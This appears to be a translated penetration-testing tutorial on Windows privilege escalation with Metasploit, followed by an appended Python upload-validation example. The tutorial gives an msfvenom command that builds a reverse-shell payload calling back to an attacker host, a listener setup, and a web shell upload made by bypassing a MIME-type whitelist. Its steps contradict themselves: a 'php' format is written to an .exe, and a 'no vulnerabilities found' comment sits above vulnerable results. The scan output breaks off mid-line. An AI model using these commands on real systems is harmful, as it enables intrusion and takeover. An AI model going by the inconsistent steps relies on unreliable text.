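I believe that everyone who studies security or works in it carries, to some degree, a sense of devotion and mission!!!
I. Privilege escalation with MSF combined with vulnerability audit tools
1. MSF vulnerability audit module: local_exploit_suggester
(1) Generate the attack payload: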
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.97.130 lport=12345 -f php > 64.exe
(2) Start the listener in msf:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.97.130
set lport 12345
exploit
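(3) By bypassing the file upload's MIME-type whitelist, the up.aspx web shell was uploaded; 64.exe was then uploaded and executed, which gave a low-privilege shell:
(4) Run the vulnerability check module in the current session: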
run post/multi/recon/local_exploit_suggester
# No vulnerabilities were found by this scan; you can try another scanning method
[+] 192.168.97.131 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.97.131 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 192.168.97.131 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 1
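
Step (3) succeeds because the upload filter trusted the MIME type declared by the client. The following is an added example, not part of the original post: a server-side upload check that ignores the declared type and decides on an extension allowlist plus the file's leading bytes. The function name validate_upload, the image-only policy and the sample inputs are assumptions made for the illustration.

```python
import os
import secrets

# Assumed policy for this example: the application accepts images only.
# Each allowed extension maps to the file signatures it must start with.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename, declared_mime, data):
    """Return (accepted, reason, stored_name).

    declared_mime comes from the request and is fully client-controlled,
    so it is accepted as a parameter but never used for the decision.
    """
    # Drop any client-supplied directory part (both separator styles).
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return (False, "extension not allowed", None)
    if not data.startswith(ALLOWED[ext]):
        return (False, "content does not match extension", None)
    # Store under a server-generated name so the client never picks the path.
    return (True, "ok", secrets.token_hex(16) + ext)


# Constructed sample uploads: (filename, declared Content-Type, first bytes).
SAMPLES = [
    ("up.aspx", "image/jpeg", b"<%@ Page Language=\"C#\" %>"),
    ("64.exe", "image/png", b"MZ\x90\x00\x03\x00"),
    ("photo.png", "image/png", b"MZ\x90\x00\x03\x00"),
    ("photo.png", "image/png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
]


def run_samples():
    """Validate every constructed sample and return the result tuples."""
    return [validate_upload(name, mime, data) for name, mime, data in SAMPLES]


if __name__ == "__main__":
    for (name, mime, _), result in zip(SAMPLES, run_samples()):
        print(f"{name:10} declared={mime:10} -> {result[0]} ({result[1]})")
```

The upload directory should also be configured so that nothing in it is executed or interpreted by the web server, which limits the damage if a check like this is ever wrong.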